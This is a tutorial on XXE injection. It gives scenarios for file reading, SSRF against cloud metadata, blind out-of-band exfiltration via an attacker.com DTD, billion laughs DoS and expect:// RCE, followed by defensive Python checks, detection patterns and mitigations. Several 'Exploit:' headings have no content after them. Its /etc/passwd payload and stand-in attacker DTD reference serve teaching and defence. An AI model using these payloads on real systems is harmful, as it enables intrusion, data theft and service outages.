XML External Entity
XML External Entity (XXE) injection is a vulnerability that occurs when an application accepts untrusted XML input and its XML parser is configured to process external entities without validation. This allows attackers to reference external files, URLs, and resources to steal data, perform server-side request forgery (SSRF), execute code, or cause denial of service.
The vulnerability exploits a legitimate XML feature (external entities) that's meant to include external content. When misconfigured, it becomes a weapon for accessing sensitive data and system resources.
Real-World Attack Scenarios
Scenario 1: Reading Local Files via In-Band XXE
An application allows users to upload XML documents for processing:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
How it works:
The attacker crafts an XML document with a DOCTYPE declaration.
Inside the DOCTYPE, they define an ENTITY that references a local file using file://.
The entity &xxe; is referenced in the XML content.
The XML parser resolves the entity and includes the file's contents.
The application returns the file contents in its response.
The response reveals:
The attacker now has user information and can attempt privilege escalation.
Finding it: Test XML endpoints with XXE payloads and check whether external entities are processed. Look for file paths or file contents in responses. Try sensitive files such as /etc/passwd, application config files, and /etc/shadow (readable only if the parser runs as root).
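A low-risk way to run this check against a parser you control is to aim the entity at a throwaway canary file rather than a real system file. The sketch below assumes a hypothetical callback, `parse_to_text`, that stands in for whatever your application does with incoming XML and returns the text it would echo back; `resolves_external_entities` is likewise an illustrative name, not part of any library.

```python
import os
import pathlib
import tempfile
import uuid
import xml.etree.ElementTree as ET


def resolves_external_entities(parse_to_text):
    """Return True if parse_to_text() leaks the contents of a canary file.

    parse_to_text is a hypothetical callback: it takes XML bytes and returns
    the text the application would send back to the client.
    """
    marker = "xxe-canary-" + uuid.uuid4().hex
    fd, path = tempfile.mkstemp(suffix=".txt")
    try:
        with os.fdopen(fd, "w") as handle:
            handle.write(marker)
        uri = pathlib.Path(path).resolve().as_uri()  # file:///... form
        payload = (
            '<?xml version="1.0"?>\n'
            f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{uri}">]>\n'
            "<foo>&xxe;</foo>"
        ).encode("utf-8")
        try:
            text = parse_to_text(payload)
        except Exception:
            return False  # the parser rejected the document outright
        return marker in (text or "")
    finally:
        os.remove(path)


def stdlib_parse(data):
    # Stand-in for an application that echoes the root element's text.
    return ET.fromstring(data).text


print(resolves_external_entities(stdlib_parse))
```

Python's `xml.etree.ElementTree` raises a `ParseError` on the external entity reference, so the check reports `False` for it. A parser for which the check returns `True` is exposed to the in-band attack described in this scenario.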
Exploit:
Scenario 2: SSRF Attack via XXE
An application processes XML documents and accesses URLs specified in external entities:
The attack:
The attacker references an internal API endpoint that's only accessible from the server. The XML parser makes the request from the server's perspective, bypassing firewall restrictions.
What the attacker can access:
Internal services on localhost:8080, localhost:5432, etc.
AWS metadata service: http://169.254.169.254/latest/meta-data/
Docker Engine API (when exposed without TLS): http://localhost:2375/
Kubernetes kubelet API: https://localhost:10250/
Internal databases
Admin panels on internal networks
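What these targets have in common is that they sit on loopback, private, or link-local addresses. As a rough sketch (the function name `is_internal_target` is made up for illustration), Python's standard `ipaddress` module can flag such URLs when reviewing system identifiers found in submitted XML. It assumes literal IP addresses or the name localhost; hostnames that resolve to internal addresses are not covered.

```python
import ipaddress
from urllib.parse import urlsplit


def is_internal_target(url):
    """Return True if the URL's host is a loopback, private, or link-local address.

    Only literal IP addresses and the name "localhost" are recognised; other
    hostnames would need DNS resolution, which this sketch deliberately skips.
    """
    host = urlsplit(url).hostname
    if host is None:
        return False  # no network host, e.g. a file:// URI
    if host == "localhost":
        return True
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name; not classified here
    return address.is_loopback or address.is_private or address.is_link_local


for candidate in (
    "http://localhost:8080/",
    "http://169.254.169.254/latest/meta-data/",
    "http://192.168.1.10/admin",
    "http://8.8.8.8/",
):
    print(candidate, is_internal_target(candidate))
```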
AWS Metadata Example:
This returns AWS credentials:
The attacker now holds the temporary credentials of the instance's IAM role and can act with whatever permissions that role grants.
Finding it: Test XXE with internal IP addresses (localhost, 127.0.0.1, 192.168.*). Try accessing metadata services. Check for cloud credentials in responses. Test common internal ports (5432 for PostgreSQL, 3306 for MySQL, 6379 for Redis).
Exploit:
Scenario 3: Blind XXE with Out-of-Band Data Exfiltration
The application processes XML but doesn't return the parsed content in its response. The attacker uses DNS or HTTP callbacks to exfiltrate data instead:
The attacker hosts an evil DTD file on their server (evil.dtd):
What happens:
The application processes the XML with the external DTD reference
The DTD reads the local file (/etc/passwd)
The DTD encodes the file contents into a URL
The DTD makes a request to attacker.com with the file contents as a parameter
The attacker receives the data in their web server logs
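The first step above depends on the document declaring an external DTD or entity, and a defender can list those declarations without fetching anything. The following is a minimal sketch using Python's `pyexpat` bindings; `declared_external_references` is a hypothetical helper, and the sample document reuses the attacker.com and evil.dtd names from this scenario.

```python
from xml.parsers import expat


def declared_external_references(data):
    """Collect the system identifiers declared in a document's DTD.

    Nothing is fetched: pyexpat only reports the declarations and does not
    load external entities unless a handler is installed to do so.
    """
    found = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id:
            found.append(("doctype", name, system_id))

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        if system_id:
            kind = "parameter-entity" if is_parameter else "entity"
            found.append((kind, name, system_id))

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)
    return found


sample = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<foo>data</foo>"""

print(declared_external_references(sample))
```

Any non-empty result for input that should be plain data is worth logging, since ordinary application payloads rarely need to point at external DTDs.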
Attacker's web server logs show:
Why it's effective:
Works even if the application doesn't return XML responses
Can work behind a WAF or IDS that blocks direct file access
Can exfiltrate data over DNS, which is harder to detect than HTTP
Combines XXE with external DTD processing
Finding it: Test with out-of-band callbacks. Set up Burp Collaborator or similar. Send XXE payloads with external DTD references. Monitor for DNS/HTTP callbacks. Check if blind XXE is possible even without direct responses.
Exploit:
Scenario 4: Denial of Service — Billion Laughs Attack
An attacker crafts an XML document with exponentially expanding entities:
What happens:
lol = 3 bytes
lol2 = 3 × 10 = 30 bytes
lol3 = 30 × 10 = 300 bytes
lol4 = 300 × 10 = 3,000 bytes
lol5 = 3,000 × 10 = 30,000 bytes
Each level multiplies the size by 10. With deeper nesting, the expanded document reaches gigabytes or terabytes, consuming all available server memory and CPU.
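The growth can be checked with a few lines of arithmetic. This sketch assumes the naming used above, where level 1 is the 3-byte lol entity and each further level references the previous one 10 times; `expanded_size` is an illustrative helper.

```python
def expanded_size(level, base_bytes=3, fanout=10):
    """Bytes produced by expanding the entity at a given nesting level.

    Level 1 is the plain "lol" entity (3 bytes); every further level
    references the previous level `fanout` times.
    """
    if level < 1:
        raise ValueError("level must be at least 1")
    return base_bytes * fanout ** (level - 1)


for level in range(1, 11):
    print(f"level {level:2d}: {expanded_size(level):,} bytes")
```

At level 10 the result is 3,000,000,000 bytes, roughly 3 GB of expanded text from a document that itself stays very small.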
Result:
Server runs out of memory
CPU usage spikes to 100%
Application becomes unresponsive
Server crashes
Legitimate users can't access the application
Finding it: Test with exponentially expanding entity payloads. Monitor CPU and memory usage while sending them. Check whether a billion laughs payload makes the application unresponsive.
Exploit:
Scenario 5: Remote Code Execution via XXE
If the server runs PHP with the expect extension loaded, XXE can execute commands through the expect:// wrapper:
Result:
The attacker can now execute arbitrary commands on the server.
Other RCE vectors (separate flaws that XXE-derived access may help reach):
Java JNDI injection via XXE
Python pickle deserialization
Ruby object injection
Custom deserialization handlers
Realistic scenario:
Downloads and executes malware from attacker's server.
Finding it: Test for RCE with XXE. Use expect:// protocol in payloads. Try common command execution protocols. Check application behavior and error messages.
Scenario 6: XXE in SOAP/Web Services
Web services often accept XML SOAP requests:
SOAP services are common targets because:
XML processing is mandatory
External entity processing often enabled by default
SOAP parsers less frequently patched
Legacy systems often use SOAP
Finding it: Test SOAP endpoints with XXE. Inject payloads in SOAP request bodies. Check WSDL files for hints about XML processing.
Scenario 7: XXE via File Upload (SVG, PDF, Word)
Applications accepting rich document uploads often process XML:
SVG File Example:
Office Document (.docx/.xlsx): These are ZIP files containing XML. Extract and modify internal XML:
PDF with embedded XML: PDFs can contain embedded XML streams vulnerable to XXE.
Finding it: Upload XML-based file formats (SVG, DOCX, XLSX, PDF). Test if XXE is processed. Check for blind XXE if no direct output.
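Because .docx and .xlsx files are ZIP archives, an upload handler can inspect their XML parts before handing them to a document library. The following is a heuristic sketch, assuming legitimate Office parts do not declare a DOCTYPE; `parts_with_doctype` is a hypothetical name, only the first few kilobytes of each part are examined, and parts stored in encodings such as UTF-16 would not match.

```python
import io
import zipfile


def parts_with_doctype(document_bytes, probe_bytes=4096):
    """List the XML parts of a ZIP-based document that declare a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(document_bytes)) as archive:
        for info in archive.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue
            # Read only the start of the part; a DOCTYPE precedes the root element.
            with archive.open(info) as part:
                head = part.read(probe_bytes)
            if b"<!DOCTYPE" in head:
                flagged.append(info.filename)
    return flagged
```

A caller might reject the upload whenever the returned list is non-empty, before any XML parser sees the content.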
Mitigation Strategies
Disable external entity processing (recommended)
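PHP: on versions before 8.0, call libxml_disable_entity_loader(true) before parsing, and avoid the LIBXML_NOENT and LIBXML_DTDLOAD flags.
Java: set the feature http://apache.org/xml/features/disallow-doctype-decl to true on the parser factory (for example DocumentBuilderFactory).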
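Python: xml.sax has not processed external general entities by default since Python 3.7.1. For other parsers, disable entity resolution explicitly or use the defusedxml package.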
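A minimal sketch with the standard library's `xml.sax`, turning both external-entity features off explicitly rather than relying on version defaults. `TextCollector` and `parse_without_external_entities` are illustrative names, not library APIs.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes


class TextCollector(ContentHandler):
    """Accumulate character data so the caller can inspect what was parsed."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_without_external_entities(data):
    """Parse XML bytes with external general and parameter entities disabled."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)  # no external general entities
    parser.setFeature(feature_external_pes, False)  # no external parameter entities
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(data))
    return "".join(collector.chunks)


print(parse_without_external_entities(b"<foo>hello</foo>"))
```

With these features off, a reference such as &xxe; to an external entity is skipped instead of being replaced by file contents.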
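C#/.NET: set XmlReaderSettings.DtdProcessing to DtdProcessing.Prohibit and XmlResolver to null.
Node.js: with libxmljs, do not enable the noent option when parsing untrusted input.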
Use whitelisting for DTD
If DTD is required, whitelist allowed DOCTYPE declarations:
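One way to sketch such an allowlist in Python is to inspect the DOCTYPE through `pyexpat` before the real parse. The allowlist contents and the name `doctype_is_allowed` are assumptions for illustration; the example permits only the SVG 1.1 DOCTYPE and rejects any internal subset, since that is where attacker-defined entities are declared.

```python
from xml.parsers import expat

# Hypothetical allowlist of (root element name, system identifier) pairs.
ALLOWED_DOCTYPES = {
    ("svg", "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"),
}


def doctype_is_allowed(data, allowed=ALLOWED_DOCTYPES):
    """Return True if the document has no DOCTYPE or an allowlisted one."""
    verdict = {"ok": True}

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # An internal subset can declare arbitrary entities, so never accept one.
        if has_internal_subset or (name, system_id) not in allowed:
            verdict["ok"] = False

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)
    return verdict["ok"]
```

Accepting a DOCTYPE here does not mean fetching it; the parser that processes the document afterwards should still have external entity loading disabled.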
Validate and sanitize input
Check file size before processing
Reject unexpected DOCTYPE declarations
Validate documents against an XML schema before the application acts on them
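These checks can be chained into one gate in front of the application. The sketch below uses only the Python standard library, which has no XML Schema validator, so a simple structural check stands in for schema validation; the size limit, the element names, and `validate_order_xml` are all hypothetical.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

MAX_BYTES = 1_000_000                           # hypothetical size limit
EXPECTED_ROOT = "order"                         # hypothetical root element
ALLOWED_CHILDREN = {"id", "customer", "total"}  # hypothetical child elements


class DoctypeFound(Exception):
    """Signals that the document carries a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    raise DoctypeFound(name)


def validate_order_xml(data):
    """Return a list of problems; an empty list means the document passed."""
    if len(data) > MAX_BYTES:
        return [f"document is {len(data)} bytes; limit is {MAX_BYTES}"]
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    try:
        checker.Parse(data, True)
    except DoctypeFound:
        return ["DOCTYPE declarations are not accepted"]
    except expat.ExpatError as exc:
        return [f"not well-formed: {exc}"]
    # No DTD is present, so building a tree cannot trigger entity expansion.
    root = ET.fromstring(data)
    problems = []
    if root.tag != EXPECTED_ROOT:
        problems.append(f"unexpected root element {root.tag!r}")
    for child in root:
        if child.tag not in ALLOWED_CHILDREN:
            problems.append(f"unexpected element {child.tag!r}")
    return problems
```

The order matters: the cheap size check runs first, and the tree is only built once the document is known to carry no DTD.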
Use safer alternatives
Use JSON instead of XML when possible
If XML is required, restrict it to a minimal subset with no DTD
Use fixed, well-defined schemas
WAF and IDS rules
Block DOCTYPE declarations
Block ENTITY declarations
Block SYSTEM keywords in XML
Monitor for XXE patterns
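For the monitoring rule, a byte-level pattern match is a reasonable first signal. The sketch below is an assumption about how such a rule might look, not a rule set from any WAF product; it will miss payloads in encodings such as UTF-16, so it complements parser hardening rather than replacing it.

```python
import re

# Patterns for the constructs listed above. Matching is case-sensitive
# because XML keywords are case-sensitive.
XXE_PATTERNS = {
    "doctype": re.compile(rb"<!DOCTYPE\b"),
    "entity": re.compile(rb"<!ENTITY\b"),
    "system": re.compile(rb"""\bSYSTEM\s+["']"""),
}


def xxe_indicators(body):
    """Return the sorted names of suspicious constructs found in a request body."""
    return sorted(name for name, pattern in XXE_PATTERNS.items() if pattern.search(body))


sample = b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
print(xxe_indicators(sample))
```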
Regular security testing
Include XXE tests in pentesting
Scan for vulnerable XML parsers
Test third-party libraries
Monitor for new XXE variants
